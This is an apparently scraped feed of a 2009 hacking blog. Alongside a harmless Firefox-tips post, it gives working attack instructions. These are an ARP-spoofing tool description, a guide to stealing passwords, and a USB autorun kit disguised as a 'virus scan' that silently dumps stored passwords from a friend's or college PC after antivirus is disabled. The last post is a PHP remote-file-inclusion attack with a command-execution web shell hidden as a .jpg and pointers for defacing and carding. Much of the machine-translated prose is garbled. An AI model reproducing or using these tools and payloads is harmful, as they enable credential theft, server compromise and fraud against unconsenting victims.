/&gt;&lt;br /&gt;-. Support arp table protect. when WinArpAttacker detects local or remote host’s is being arp-spoofing, it will recover local or remote host’s arp tables as you wish.&lt;br /&gt;&lt;br /&gt;1.5 Proxy Arp&lt;br /&gt;&lt;br /&gt;-. When hosts on your lan request other hosts’ mac address, WinArpAttacker will tell it a certain mac address as you wish.&lt;br /&gt;&lt;br /&gt;-. It aims to realize accessing the internet without changing your ip on a new lan, but it also can make your lan in a big mass if you assign a wrong mac address.&lt;br /&gt;&lt;br /&gt;1.6 Save arp packets&lt;br /&gt;&lt;br /&gt;-. It can save all sniffed arp packets to file.&lt;br /&gt;&lt;br /&gt;1.7 other features.&lt;br /&gt;&lt;br /&gt;-. Support multi-network adapter and multi-ip address and multi-gateway on a computer, you can select different adapter and ip address to scan different lan.&lt;br /&gt;&lt;br /&gt;-. Support DHCP and fixed ip address.&lt;br /&gt;&lt;br /&gt;-. Count all the arp packets for each host, including sent and recieved arp packets.&lt;br /&gt;&lt;br /&gt;Arp R/S Q/P&lt;br /&gt;&lt;br /&gt;| |&lt;br /&gt;&lt;br /&gt;Action(Recive/Send) Arp packets type(ReQuest/RePly)&lt;br /&gt;&lt;br /&gt;- – - -&lt;br /&gt;&lt;br /&gt;ArpRQ meaning: The number of arp request packets recieved&lt;br /&gt;&lt;br /&gt;ArpRP meaning: The number of arp reply packets recieved&lt;br /&gt;&lt;br /&gt;ArpSQ meaning: The number or arp request packets sent&lt;br /&gt;&lt;br /&gt;ArpSP meaning: The number or arp reply packets sent&lt;br /&gt;&lt;br /&gt;2. System Requirement.&lt;br /&gt;&lt;br /&gt;————————————&lt;br /&gt;&lt;br /&gt;-. Local : Windows XP/2000/2003/vista all version&lt;br /&gt;&lt;br /&gt;-. Remote : All computers including network devices&lt;br /&gt;&lt;br /&gt;-. WinPcap driver lastest must be needed ( all ready inside rar)&lt;br /&gt;&lt;br /&gt;3. What’s New&lt;br /&gt;&lt;br /&gt;————————————&lt;br /&gt;&lt;br /&gt;+ It can scan a large ip range for online hosts by advanced scanning mode.&lt;br /&gt;&lt;br /&gt;+ It can protect local and reomte hosts from arp-spoofing.&lt;br /&gt;&lt;br /&gt;+ It can enable proxy arp, act as a arp proxy.&lt;br /&gt;&lt;br /&gt;+ It can save all sniffed arp packets to file.&lt;br /&gt;&lt;br /&gt;4. Getting Started&lt;br /&gt;&lt;br /&gt;————————————&lt;br /&gt;&lt;br /&gt;-. Firtly, install the latest WinPcap driver (Already in rar files)&lt;br /&gt;&lt;br /&gt;-. second, just run LAN Attacker (Standalone no need instalation)&lt;br /&gt;&lt;br /&gt;-. click scan button and start button&lt;br /&gt;&lt;br /&gt;-. look at arp information on remote computer with “arp -a”&lt;br /&gt;&lt;br /&gt;-. to stop attack, click stop button.&lt;br /&gt;&lt;br /&gt;-. to select adapter or ip address, click options button.&lt;br /&gt;&lt;br /&gt;-. to modify attacking setup, click options button.&lt;br /&gt;&lt;br /&gt;- If there are many active hosts (more than 50) and the real gateway may be down on LAN.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-5825794510176879562?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/5825794510176879562/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/12/lan-attacker-2009-v35.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/5825794510176879562'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/5825794510176879562'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/12/lan-attacker-2009-v35.html' title='LAN Attacker 2009 V3.5'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_Dctv9GCvTgs/Sz0AhCxex1I/AAAAAAAAAU4/JHkub75MKsY/s72-c/noyr6r.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-1788692909123863649</id><published>2009-12-31T11:43:00.000-08:00</published><updated>2009-12-31T11:45:19.740-08:00</updated><title type='text'>How to Get Password Hackers</title><content type='html'>Password theft, account takeover, it is often the case in the cyber world. It's not a difficult thing to do, but many of the newbie who just kept wondering .. "How do I get the other person's email password?" Or the most frequent questions I receive is .. "How do you get my password?": P &lt;br /&gt;&lt;br /&gt;For questions that this article was written, hopefully you can add insight and open your mind about the importance of keeping the &lt;span class="fullpost"&gt;&lt;br /&gt;accounts in vulnerable places. &lt;br /&gt;&lt;br /&gt;How to get it? &lt;br /&gt;&lt;br /&gt;There are many ways to get a password. Some of them do not require special skills. Here are the ways of the most common and most frequently used: &lt;br /&gt;&lt;br /&gt;[1]. Social Engineering &lt;br /&gt;&lt;br /&gt;[2]. KeyLogger &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;[3]. Web Spoofing &lt;br /&gt;&lt;br /&gt;[4]. Block Email &lt;br /&gt;&lt;br /&gt;[5]. Password Cracking &lt;br /&gt;&lt;br /&gt;[6]. Session Hijacking &lt;br /&gt;&lt;br /&gt;[7]. Being a Proxy Server &lt;br /&gt;&lt;br /&gt;[8]. Failure to take advantage of the use of User Features &lt;br /&gt;&lt;br /&gt;Browser &lt;br /&gt;&lt;br /&gt;[9]. Googling &lt;br /&gt;&lt;br /&gt;[1]. Social Engineering &lt;br /&gt;&lt;br /&gt;Social Engineering is the name of a technique of collecting information by utilizing the gap victim psychology. Or maybe it should also be said as "fraud": P Social Engineering requires patience and caution to the unsuspecting victim. We are required to be creative and able to think like the victim. &lt;br /&gt;&lt;br /&gt;Social Engineering is the art of "force" others to do things according to your expectations or desires. Of course "coercion" does not explicitly or outside the normal behavior is typical of the victim. &lt;br /&gt;&lt;br /&gt;Humans tend to believe or easily swayed toward someone who has a big name, never (or are trying) to help, and have the words or a convincing performance. This is often used principal social engineering to ensnare his victims. Often the perpetrator make a condition that we have some addiction kepadanya.Ya, we unknowingly he conditioned us on an issue and make (as if - if only) that he can overcome that problem. Thus, we would tend to do what he instructed without feeling suspicious. &lt;br /&gt;&lt;br /&gt;Social Engineering is sometimes a serious threat. It seems there is no connection with technology, social engineering but still skeptical as feasible can be fatal for your system. Why?? Because after all a computer still can not get away from humans. Yes, there is no single system komputerpun on this earth that can escape from human intervention. your defense as much as anything, if you are already controlled by the attacker through social engineering, then maybe you are the one who opened the entrance to the attacker. &lt;br /&gt;&lt;br /&gt;[2]. KeyLogger &lt;br /&gt;&lt;br /&gt;KeyLogger is a software that can record user activities. The results were used to record stored in the form of text or images. KeyLogger work by tapping the keyboard user. This application is able to identify sensitive forms such as a password form. &lt;br /&gt;&lt;br /&gt;There is a safe way to avoid keyloger: &lt;br /&gt;&lt;br /&gt;1. Use a password with special characters such as !@#$%^&amp;*(){}[]. Most keyloger will ignore these characters so that the perpetrator (keyloger installer) will not get the actual password. &lt;br /&gt;&lt;br /&gt;2. Prepare your password from home, save in the form of text. We want to enter a password, copy-paste tingal ajah. Keyloger will read your password by tapping the keyboard. But this risky way. Why? because when you make a copy, your data will be stored on the clipboard. We have found many free software that can display the data in the clipboard. &lt;br /&gt;&lt;br /&gt;[3]. Web Spoofing &lt;br /&gt;&lt;br /&gt;Still remember the case of some customers pecurian Account Bank BCA? Yes, that's one good example of Web spoofing. The essence of this technique is to use a user error when typing a website address into the address bar. Basically, Web Spoofing is an attempt to deceive the victim into thinking he is accessing a particular site, but it's not. &lt;br /&gt;&lt;br /&gt;In the case of BCA, the perpetrator makes the site very similar and identical to the original site so that the victim will not be fooled in doubt fill in sensitive information such as user name and password. In fact, because the site is a scam site, then all this valuable information recorded by the fake Web server, which is owned by the perpetrator. &lt;br /&gt;&lt;br /&gt;[4]. Block Email &lt;br /&gt;&lt;br /&gt;Block email? Yes, and very easy to do this. One way is to use mailsnarf contained in dsniff utilities. How it works is by blocking Mailsnarf data packets through the Internet and arranged them into an email intact. &lt;br /&gt;&lt;br /&gt;Mailsnift is Dsniff and software work on the basis of WinPcap (equivalent to the Linux libcap) is a library that captures data packets. Packets captured will be stored in a file by Windump, while MailSnarf act Dsniff and further analyze the data packets and display the password (dsniff) or email content (mailsnarf). &lt;br /&gt;&lt;br /&gt;[5]. Password Cracking &lt;br /&gt;&lt;br /&gt;"Hacking while sleeping." Was the phrase commonly used by people who do password cracking. Why? Because in general dibuthkan a long time to perform password cracking. Could for hours, even for days - days! It all depends on the target, whether the target using a common password, password length unusual character, or a combination of passwords with special characters. &lt;br /&gt;&lt;br /&gt;One of the commonly used software to do this is by using Brutus, one of the remote password cracker software is quite popular. Brutus works with technical dictionary attack or bruce-force attack on http ports, POP3, ftp, telnet, and NetBIOS. &lt;br /&gt;&lt;br /&gt;Dictionary attacks try to work with words in the dictionary passwords. While brute - force attack try to work with all combinations of letters, numbers, or characters. &lt;br /&gt;&lt;br /&gt;Brute Force Atack working very slow and takes a long time depending on the type of computer specifications and character length password. We have had many sites that closed access to access to the login attempt constantly to no avail. &lt;br /&gt;&lt;br /&gt;If you want to do Cracking passwords, please choose - choose their own applications on page Member - spyrozone.tk. &lt;br /&gt;&lt;br /&gt;[6]. Session Hjacking &lt;br /&gt;&lt;br /&gt;Session hijacking is more widespread today among the attackers. Session Hijacking usually done by doing imitation cookies. So in essence, we must be able to imitate the victim's cookies to get their login session. &lt;br /&gt;&lt;br /&gt;So how do I get the victim's cookies? &lt;br /&gt;&lt;br /&gt;1. By analysis Cookies. &lt;br /&gt;&lt;br /&gt;This method is relatively difficult to do. &lt;br /&gt;&lt;br /&gt;2. Stealing Cokies. &lt;br /&gt;&lt;br /&gt;For example The Attacker wants to obtain the account A. The Attacker can easily make such a script that inserted Java script in the email to be sent to the victim opens the email korban.Saat it, subconsciously stolen and cookies will be recorded onto a Web server using a PHP script. &lt;br /&gt;&lt;br /&gt;These days most often the target of a Friendster account. There are inserting a Scipt through testimonials, there is a paste in his own profile to steal the victim's cookies and so forth. I have tips for this: &lt;br /&gt;&lt;br /&gt;1. Do not use the Internet Explorer browser &lt;br /&gt;&lt;br /&gt;We want to open other people's profiles, do not use Internet Explorer. Write down the address you want to come along the profile view, first logout of your account and remove all cookies, then open your Friendster profile goals. &lt;br /&gt;&lt;br /&gt;2. Check the source code &lt;br /&gt;&lt;br /&gt;When receiving testimonials, please check your source code. Is there are foreign script or word which is identical with such counterfeiting: &lt;br /&gt;&lt;br /&gt;"HACKED", "defaced", "Owned" .. etc. .. &lt;br /&gt;&lt;br /&gt;If in doubt ... .... ajah reject .. &lt;br /&gt;&lt;br /&gt;3. LOGOUT suddenly. &lt;br /&gt;&lt;br /&gt;Alert when without a good reason you are suddenly logged off automatically from your account. When you are asked to enter a username and password, your addressbar preview! whether you are on the proper or not. Check the source code on the form tersebut.Lihat page action, where your information will be sent. &lt;br /&gt;&lt;br /&gt;Actual session hijacking can be prevented if only the service provider notice the following things:&lt;br /&gt;&lt;br /&gt;1. Assign a unique session identifier &lt;br /&gt;&lt;br /&gt;2. Define the random pattern identifier system &lt;br /&gt;&lt;br /&gt;3. Session identifier is independent &lt;br /&gt;&lt;br /&gt;4. Session identifier that can be mapped to the connection &lt;br /&gt;&lt;br /&gt;client side. &lt;br /&gt;&lt;br /&gt;Another phenomenon is that, until now this article was published, it is often found that users who do not sign out after opening the account. Thus, people who use the computer and open the same website that has been opened by the first person will be automatically logged into the victim's account. &lt;br /&gt;&lt;br /&gt;[7]. Being a Proxy Server &lt;br /&gt;&lt;br /&gt;We can gather information with a proxy server for the victim to be able to surf. With a proxy server, the identity of the surfer can be ours. &lt;br /&gt;&lt;br /&gt;[8]. Failure to take advantage of the user in the use of features &lt;br /&gt;&lt;br /&gt;browser &lt;br /&gt;&lt;br /&gt;Each browser must have features intended for convenience and comfort of users in the surf. Among them is the existence of the cache and Password Manager. &lt;br /&gt;&lt;br /&gt;On the Internet of course a lot of websites whose content is not changed within a few days (for example spyrozone.tk Well, for a site like this cache be very useful. Cache will store the files so that future browsing if you visit the site again to the browser no longer have to download a second time from the server so that every page of your site that has previously opened will open more quickly. All that is usually governed by the header time to live. &lt;br /&gt;&lt;br /&gt;Well, what about the sites of news providers are always up to date? For such sites, time to live it will be set = 0 so that later you will continue to download every time a visit. &lt;br /&gt;&lt;br /&gt;Not comfortable enough? Yes, but the threat began to emerge. Try now you explore the options related to the cache in your browser. Of course you can see that there are facilities to determine how much temporary files that can be stored on disk. Search also the location where the files will be saved. &lt;br /&gt;&lt;br /&gt;Try to open the folder, you will see the files html &amp; image files from sites you've visited. In the IE browser, you can see the location of the cache files by exploring the Tools menu -&gt; Internet options -&gt; Settings &lt;br /&gt;&lt;br /&gt;Then what can be found?? anyway just the files "trash"?? Hmm ... now let you copy all the files there into a folder. Then open one of htmlnya file. If the public computer, you can see what sites have been accessed by the person before you. &lt;br /&gt;&lt;br /&gt;Hmm .. just by looking at your temporary files can even see the password and etc.. I met lots of sites that store passwords and display them on the url. Of course you also must have often read in many tutorials. &lt;br /&gt;&lt;br /&gt;Most current browsers have a facility for storing passwords. For example when meggunakan Mozilla Firefox, you'll often receive a confirmation dialog box asking if you want your password saved or not by PasswordManager.Kebanyakan users tend to choose the YES option, either knowingly, or did they not know (read: do not want to know ) what the purpose of the dialogue box. &lt;br /&gt;&lt;br /&gt;Others who then use the browser that can very easily get the password by entering the victim's Tools menu -&gt; Options -&gt; Security -&gt; Saved passwords. &lt;br /&gt;&lt;br /&gt;Another example is the password wand facilities owned by the Opera browser. When you enter a user name and password in a form and pressing the submit button, an opera by default will be asked to confirm to you whether you want the browser to save your id and password or not. Again and again ... most netter careless, they tend to select the option "YES". &lt;br /&gt;&lt;br /&gt;So?? Others who then use a browser that can see what sites have been accessed by the user, point your browser to the site, place the cursor on a form the user name, press [ALT] + [ENTER] and BOOOMM!! Why? Do not be surprised yet!! Hehehe .. will automatically login with your user name filled in full with the victims password; D (It's fun enough .. &lt;br /&gt;&lt;br /&gt;This is only a small example, the feature-firtur explore other browsers! &lt;br /&gt;&lt;br /&gt;[9]. Googling &lt;br /&gt;&lt;br /&gt;Google.com. Many sites have collapsed, passwords and numbers - credit card numbers stolen from the behavior of people who used to menyalahgunaan miracle, it's easy dilakukan.Hanya by typing certain keywords associated with a user name and password, you can harvest hundreds of user passwords via google. But now it seems you have to bite the fingers if you use the above; D &lt;br /&gt;&lt;br /&gt;Do not be sad before because Google has just spawned a new product, the Google Code Search. New threat began to emerge, "the smart" is now able to crawl up to the archive files that are in a public web server directory. Be careful who had a habit to store important information in it (passwords, and other valuable information) should begin now eliminated the habit. Always protect folders sensitive to your site can live longer. Kalo nggak yach ... .. wait ajah anyone using the new product is to dredge google sensitive information from the web server. and if it had happened ... so be prepared .. "Playground" you will be taken over by it ..&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-1788692909123863649?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/1788692909123863649/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/12/how-to-get-password-hackers.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/1788692909123863649'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/1788692909123863649'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/12/how-to-get-password-hackers.html' title='How to Get Password Hackers'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-2322214913745220882</id><published>2009-12-28T20:40:00.000-08:00</published><updated>2009-12-28T20:44:28.206-08:00</updated><title type='text'>how-to-hack-passwords-using-usb</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Dctv9GCvTgs/SzmIeQ-HL-I/AAAAAAAAAUY/bJAzXUfNc80/s1600-h/images.jpeg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 112px; height: 150px;" src="http://4.bp.blogspot.com/_Dctv9GCvTgs/SzmIeQ-HL-I/AAAAAAAAAUY/bJAzXUfNc80/s400/images.jpeg" border="0" alt=""id="BLOGGER_PHOTO_ID_5420513680050040802" /&gt;&lt;/a&gt;&lt;br /&gt;Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer. We need the following tools to create our rootkit.&lt;br /&gt;&lt;br /&gt;MessenPass: Recovers the passwords of most popular Instant Messenger &lt;span class="fullpost"&gt;programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.&lt;br /&gt;&lt;br /&gt;Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.&lt;br /&gt;Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.&lt;br /&gt;&lt;br /&gt;IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0&lt;br /&gt;&lt;br /&gt;Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…&lt;br /&gt;&lt;br /&gt;PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.&lt;br /&gt;&lt;br /&gt;Here is a step by step procedure to create the password hacking toolkit.&lt;br /&gt;&lt;br /&gt;NOTE: You must temporarily disable your Anti-Virus before following these steps.&lt;br /&gt;&lt;br /&gt;1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.&lt;br /&gt;&lt;br /&gt;ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.&lt;br /&gt;&lt;br /&gt;2. Create a new Notepad and write the following text into it&lt;br /&gt;&lt;br /&gt;    [autorun]&lt;br /&gt;    open=launch.bat&lt;br /&gt;    ACTION= Perform a Virus Scan&lt;br /&gt;&lt;br /&gt;save the Notepad as autorun.inf&lt;br /&gt;&lt;br /&gt;Now copy the autorun.inf file onto your USB pendrive.&lt;br /&gt;&lt;br /&gt;3. Create another Notepad and write the following text onto it.&lt;br /&gt;&lt;br /&gt;    start mspass.exe /stext mspass.txt&lt;br /&gt;&lt;br /&gt;    start mailpv.exe /stext mailpv.txt&lt;br /&gt;&lt;br /&gt;    start iepv.exe /stext iepv.txt&lt;br /&gt;&lt;br /&gt;    start pspv.exe /stext pspv.txt&lt;br /&gt;&lt;br /&gt;    start passwordfox.exe /stext passwordfox.txt&lt;br /&gt;&lt;br /&gt;save the Notepad as launch.bat&lt;br /&gt;&lt;br /&gt;Copy the launch.bat file also to your USB drive.&lt;br /&gt;&lt;br /&gt;Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps&lt;br /&gt;&lt;br /&gt;1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).&lt;br /&gt;&lt;br /&gt;2. In the pop-up window, select the first option (Perform a Virus Scan).&lt;br /&gt;&lt;br /&gt;3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.&lt;br /&gt;&lt;br /&gt;4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.&lt;br /&gt;&lt;br /&gt;This hack works on Windows 2000, XP and Vista.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-2322214913745220882?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/2322214913745220882/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/12/httphack-heckblogspotcom200912how-to.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/2322214913745220882'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/2322214913745220882'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/12/httphack-heckblogspotcom200912how-to.html' title='how-to-hack-passwords-using-usb'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_Dctv9GCvTgs/SzmIeQ-HL-I/AAAAAAAAAUY/bJAzXUfNc80/s72-c/images.jpeg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-7664693244389325586</id><published>2009-12-28T20:37:00.001-08:00</published><updated>2009-12-28T20:37:58.768-08:00</updated><title type='text'>8 Hidden Firefox Secrets Revealed</title><content type='html'>The best thing about Firefox is that just when you think you know everything there is to know about the browser, something new comes along and surprises you. Here are few hidden tips and tricks. Maybe &lt;span class="fullpost"&gt;these are old hat and you know them already. Or maybe you had no idea these could be done. Lets see how many of these you know already.&lt;br /&gt;&lt;br /&gt;1. Open docx file using Firefox without Office 2007: Now, you can view docx files using Firefox by installing OpenXMLViewer which is available for Windows, Mac and Linux users. It is an useful extension for users who haven’t upgrade to Microsoft Office 2007. Basically, the extension will convert docx documents into HTML format so that web browsers can render and display to users. So, the extension is not able to shows embedded objects.&lt;br /&gt;&lt;br /&gt;2. More screen space: Make your icons small. Go to View – Toolbars – Customize and check the “Use small icons” box.&lt;br /&gt;&lt;br /&gt;3. Mouse shortcuts: We all are aware of the Keyboard shortcuts. But have you ever tried Mouse Shortcuts. Sometimes you are already using your mouse and it is easier to use a mouse shortcut than to go back to the keyboard. Master these cool ones&lt;br /&gt;&lt;br /&gt;* Middle click on link (opens in new tab)&lt;br /&gt;* Shift-scroll down (previous page)&lt;br /&gt;* Shift-scroll up (next page)&lt;br /&gt;* Ctrl-scroll up (decrease text size)&lt;br /&gt;* Ctrl-scroll down (increase text size)&lt;br /&gt;* Middle click on a tab (closes tab)&lt;br /&gt;&lt;br /&gt;4. Limit RAM usage: If Firefox takes up too much memory on your computer, you can limit the amount of RAM it is allowed to us. Go to about:config, filter “browser.cache” and select “browser.cache.disk.capacity”. It’s set to 50000, but you can lower it, depending on how much memory you have. Try 15000 if you have between 512MB and 1GB ram.&lt;br /&gt;&lt;br /&gt;5. Reduce RAM usage further for when Firefox is minimized: This setting will move Firefox to your hard drive when you minimize it, taking up much less memory. And there is no noticeable difference in speed when you restore Firefox, so it’s definitely worth a go. Again, go to about:config, right-click anywhere and select New-&gt; Boolean. Name it “config.trim_on_minimize” and set it to TRUE. You have to restart Firefox for these settings to take effect.&lt;br /&gt;&lt;br /&gt;6. Move or remove the close tab button: Do you accidentally click on the close button of Firefox’s tabs? You can move them or remove them, again through about:config. Edit the preference for “browser.tabs.closeButtons”. Here are the meanings of each value:&lt;br /&gt;&lt;br /&gt;0: Display a close button on the active tab only&lt;br /&gt;&lt;br /&gt;1: (Default) Display close buttons on all tabs&lt;br /&gt;&lt;br /&gt;2: Don’t display any close buttons&lt;br /&gt;&lt;br /&gt;3: Display a single close button at the end of the tab bar (Firefox 1.x behavior)&lt;br /&gt;&lt;br /&gt;7. Smart keywords: Smart keywords are an easy way to search specific websites directly from the Firefox Location bar. Instead of going to the targeted website, finding the search function, and executing the search, you can search the website using Firefox, while you are at any website.&lt;br /&gt;&lt;br /&gt;For example, suppose you search The Internet Movie Database (IMDB) on a regular basis. You can define a smart keyword to enable searching IMDB through your browser. To search IMDB for information on William Shatner, you would enter the following in the Firefox Location bar: imdb William Shatner&lt;br /&gt;&lt;br /&gt;To create a Smart Keyword you can follow the steps given in this Tutorial&lt;br /&gt;&lt;br /&gt;8. Firefox Optimizer: Firefox Optimizers for Mozilla Firefox v1.x / 2.x / 3.x was developed for an easy and fast optimization of your browsing experience with Firefox. It is based on a collection of popular and well working optimization settings used and tested by the experts. You can download this software from here.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7130931598212594807-7664693244389325586?l=my-hacking.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://my-hacking.blogspot.com/feeds/7664693244389325586/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://my-hacking.blogspot.com/2009/12/8-hidden-firefox-secrets-revealed.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/7664693244389325586'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7130931598212594807/posts/default/7664693244389325586'/><link rel='alternate' type='text/html' href='http://my-hacking.blogspot.com/2009/12/8-hidden-firefox-secrets-revealed.html' title='8 Hidden Firefox Secrets Revealed'/><author><name>Admin</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='16' src='http://1.bp.blogspot.com/_Dctv9GCvTgs/Slr-3JnY3CI/AAAAAAAAAGc/80oP0FbUdf0/S220/images.jpeg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7130931598212594807.post-3224437547296274957</id><published>2009-12-14T20:41:00.000-08:00</published><updated>2009-12-14T20:43:41.595-08:00</updated><title type='text'>Hack a server using PHP Bugs Injection.</title><content type='html'>Preparation:&lt;br /&gt;1. - Hosting File (jg free Yg lot. Example: Geocities, Ripway, etc.)&lt;br /&gt;2. - Kangen band's song for you damn action nemenin&lt;br /&gt;Okay, copy and paste the following script&lt;br /&gt;Code:&lt;br /&gt;&lt;span class="fullpost"&gt;&lt;br /&gt; // CMD - To Execute Command on File Injection Bug (gif - jpg-txt)&lt;br /&gt;&lt;br /&gt;if (isset ($ chdir)) @ chdir ($ chdir);&lt;br /&gt;&lt;br /&gt;ob_start ();&lt;br /&gt;&lt;br /&gt;system ( "$ cmd 1&gt; / tmp / cmdtemp 2&gt; &amp;1; cat / tmp / cmdtemp; rm / tmp / cmdtemp");&lt;br /&gt;&lt;br /&gt;$ output = ob_get_contents ();&lt;br /&gt;&lt;br /&gt;ob_end_clean ();&lt;br /&gt;&lt;br /&gt;if (! empty ($ output)) echo str_replace ("&gt;", "&gt;", str_replace ("&lt;", "&lt;",&lt;br /&gt;&lt;br /&gt;$ output));&lt;br /&gt;&lt;br /&gt;?&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;bean-rebuz-hackers.200u.com&lt;br /&gt;&lt;br /&gt;Exclusif for Hackers community | www.Hacker.200u.com&lt;br /&gt;&lt;br /&gt;Join us at Hackers.200u.com&lt;br /&gt;&lt;br /&gt;If so, save with the name and format.jpg CMD. Then upload to hosting you. (Jg free Yg many, udh discussed above) When I upload, then I'll get a URL like the following:&lt;br /&gt;http://www.geocities/kacangrebuz/cmd.jpg&lt;br /&gt;After that search for targets (This requires a high level of patience)&lt;br /&gt;After the meet, for example:&lt;br /&gt;http://www.target.com/main.php?page=article&lt;br /&gt;Well, you change its URL jd&lt;br /&gt;. http://www.target.com/main.php?page=http://www.geocities/kacangrebuz/cmd.jpg&amp;cmd =&lt;br /&gt;Then they will be executed URL! example:&lt;br /&gt;. http://www.target.com/main.php?page=http://www.geocities/kacangrebuz/cmd.jpg&amp;cmd=ls-l&lt;br /&gt;and his tough results ... browser will menampilakan all imaginable directory in UNIX server according to the command above (ls-l is the command to view the contents of its directory&lt;br /&gt;permissions).&lt;br /&gt;For Defacing or carding, you can mengexplore lbh far lg ...&lt;br /&gt;Okay ... okay ... I love him keyword:&lt;br /&gt;to deface = "index.html, index.php, index.htm"&lt;br /&gt;for carding = "orderlog.txt, order.php"&lt;br /&gt;All exist on the server, live how you find it: D&lt;br /&gt;so ... Happy 